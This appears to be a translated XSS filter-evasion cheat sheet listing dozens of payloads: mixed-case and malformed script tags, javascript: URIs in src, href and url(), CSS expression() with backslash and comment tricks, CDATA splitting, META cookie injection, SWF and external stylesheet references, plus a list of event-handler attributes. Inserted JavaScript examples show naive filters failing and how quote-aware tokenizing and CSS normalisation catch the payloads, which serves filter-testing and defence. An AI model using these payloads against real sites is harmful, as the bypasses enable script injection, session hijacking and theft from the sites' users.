1. Change the case of the characters

<sCript>alert('d')</scRipT>
2. Add extra characters to get past a regular-expression check

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use an extension other than .js

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:
body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
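The payloads in sections 1, 2 and 5 are aimed at one specific kind of filter: pair the first "<" with the next ">", take the first token as the tag name, compare it with "script". The added example below (not part of the original post; all function names are my own) puts that naive check next to a small quote-aware tokenizer that follows the rules a browser's HTML tokenizer applies: a "<" not followed by a letter is plain text (so "<<script>" is "<" plus a real script tag), a tag name ends at whitespace, "/" or ">" (so "<SCRIPT/SRC=" still names SCRIPT), and a quoted attribute value may contain ">" (so the SRC after a=">" is still seen). It only tokenizes start tags, which is all that matters for finding script elements and their sources.

```javascript
// Added example for sections 1, 2 and 5; not part of the original post.
// naiveFirstTag/naiveBlocksScript model the filter those payloads target;
// tokenizeStartTags models what the browser actually does with them.

// --- naive check: first "<" paired with next ">", first token compared ---
function naiveFirstTag(html) {
  const lt = html.indexOf('<');
  const gt = lt === -1 ? -1 : html.indexOf('>', lt + 1);
  if (lt === -1 || gt === -1) return { name: '', attrs: '' };
  const [name, ...rest] = html.slice(lt + 1, gt).split(/\s+/);
  return { name, attrs: rest.join(' ') };
}

function naiveBlocksScript(html) {
  return naiveFirstTag(html).name === 'script';   // exact, case-sensitive
}

// --- quote-aware tokenizer: every start tag as { name, attrs } ---------
function tokenizeStartTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) break;
    // "<" not followed by a letter is text, not a tag start.
    if (!/[A-Za-z]/.test(html[lt + 1] || '')) { i = lt + 1; continue; }
    let j = lt + 1;
    while (j < html.length && !/[\s\/>]/.test(html[j])) j++;   // name ends at ws, "/" or ">"
    const name = html.slice(lt + 1, j).toLowerCase();
    const attrs = {};
    while (j < html.length && html[j] !== '>') {
      if (/[\s\/]/.test(html[j])) { j++; continue; }             // "/" between attributes is noise
      let k = j;
      while (k < html.length && !/[\s\/>=]/.test(html[k])) k++;
      const attrName = html.slice(j, k).toLowerCase();
      let value = '';
      while (k < html.length && /\s/.test(html[k])) k++;
      if (html[k] === '=') {
        k++;
        while (k < html.length && /\s/.test(html[k])) k++;
        const q = html[k];
        if (q === '"' || q === "'") {
          // A quoted value runs to the matching quote, even across ">".
          const end = html.indexOf(q, k + 1);
          value = end === -1 ? html.slice(k + 1) : html.slice(k + 1, end);
          k = end === -1 ? html.length : end + 1;
        } else {
          const start = k;                                       // unquoted: to ws or ">"
          while (k < html.length && !/[\s>]/.test(html[k])) k++;
          value = html.slice(start, k);
        }
      }
      if (attrName && !(attrName in attrs)) attrs[attrName] = value;  // first wins, as in browsers
      j = k;
    }
    tags.push({ name, attrs });
    i = j + 1;
  }
  return tags;
}

function containsScriptElement(html) {
  return tokenizeStartTags(html).some((t) => t.name === 'script');
}

function scriptSources(html) {
  return tokenizeStartTags(html)
    .filter((t) => t.name === 'script' && 'src' in t.attrs)
    .map((t) => t.attrs.src);
}

// Payloads copied from sections 1, 2, 3 and 5 above.
const demoPayloads = [
  "<sCript>alert('d')</scRipT>",
  "<<script>alert('c')//<</script>",
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',
  '<SCRIPT/SRC="t.js"></SCRIPT>',
  '<script src="bad.jpg"></script>',
];
for (const p of demoPayloads) {
  console.log(`naive=${naiveBlocksScript(p)} tokenizer=${containsScriptElement(p)} src=${JSON.stringify(scriptSources(p))}  ${p}`);
}
```

Only the last payload, the plain one, is caught by the naive check; the tokenizer reports a script element for all five and returns the SRC for the three that carry one, including the one behind a=">" and the one after "/". The backtick variant in section 2 is the exception: a current browser does not treat "`" as a quote, so the tokenizer above, like the browser, ends that tag at the first ">"; that payload relied on old Internet Explorer.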
6. Use a tab or a newline to evade

<img src="jav	ascr	ipt:alert('XSS3')">	-> tab
<img src="jav
ascr
ipt:alert('XSS3')">	-> new line
<IMG SRC="jav	ascript:alert('XSS');">
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
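Why the section 7 payloads work: CSS is tokenized before any property or value is interpreted, and at that stage comments disappear and backslash escapes are decoded, so "expre\ssion(" and "ex/*XSS*//*/*/pression(" both reach the engine as "expression(". A filter that greps the raw text never sees that string. The added example below (not part of the original post; function names are my own) applies the same two steps before checking, and shows the string-aware comment stripping needed for the last payload, where the "/*" inside noxss("*//*") is placed to make a careless stripper start a comment in the wrong place. The escape decoder is a simplification of the CSS Syntax rules: it handles "\" + 1-6 hex digits and "\" + any other character, and ignores the newline special case.

```javascript
// Added example for section 7; not part of the original post.

// Remove /* ... */ comments. String literals and backslash escapes are copied
// verbatim, so "/*" inside quotes or an escaped "/" cannot open a comment.
function stripCssComments(css) {
  let out = '';
  let i = 0;
  while (i < css.length) {
    const c = css[i];
    if (c === '\\') {                      // escaped character, never a comment start
      out += css.slice(i, i + 2);
      i += 2;
    } else if (c === '"' || c === "'") {   // string literal: copy to the matching quote
      let j = i + 1;
      while (j < css.length && css[j] !== c) j += css[j] === '\\' ? 2 : 1;
      out += css.slice(i, j + 1);
      i = j + 1;
    } else if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 2;
    } else {
      out += c;
      i += 1;
    }
  }
  return out;
}

// Decode CSS escapes: "\" + 1-6 hex digits (+ one optional whitespace) is a
// code point; "\" + any other character is that character itself.
function decodeCssEscapes(css) {
  return css.replace(/\\([0-9a-fA-F]{1,6}\s?|[\s\S])/g, (_, esc) => {
    const hex = /^[0-9a-fA-F]{1,6}/.exec(esc);
    if (!hex) return esc;
    const cp = parseInt(hex[0], 16);
    return String.fromCodePoint(cp === 0 || cp > 0x10ffff ? 0xfffd : cp);
  });
}

function normalizeCss(css) {
  return decodeCssEscapes(stripCssComments(css)).toLowerCase();
}

const CSS_DANGER = /expression\s*\(|javascript\s*:|@import/;

function naiveCssFilter(css) {        // checks the raw text
  return CSS_DANGER.test(css.toLowerCase());
}

function cssLooksDangerous(css) {     // checks what the CSS engine will see
  return CSS_DANGER.test(normalizeCss(css));
}

// The style contents from the five section 7 payloads.
const demoStyles = [
  String.raw`@im\port'\ja\vasc\ript:alert("XSS32")';`,
  String.raw`xss:expre\ssion(alert("XSS33"))`,
  String.raw`xss:expr/*anyword*/ession(alert('sss'))`,
  String.raw`width: expre\ssi\on(alert('XSS31'));`,
  String.raw`no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))`,
];
for (const s of demoStyles) {
  console.log(`naive=${naiveCssFilter(s)} normalised=${cssLooksDangerous(s)}  ${normalizeCss(s)}`);
}
```

The raw-text filter misses all five; after normalisation every one of them contains "expression(" or "@import" followed by "javascript:". Note that expression() and @import of a javascript: URL are Internet Explorer features; the normalisation step is still the right place to start for any CSS allowlist, because it is what the engine does first.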
8. Use hex encoding to evade (the ";" can also be dropped)
(The encoded forms are not preserved on this page; each payload and its "source" line read the same.)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag (event handlers)

<body onload="alert('onload')">

Event-handler attributes that can carry script: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code, then reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>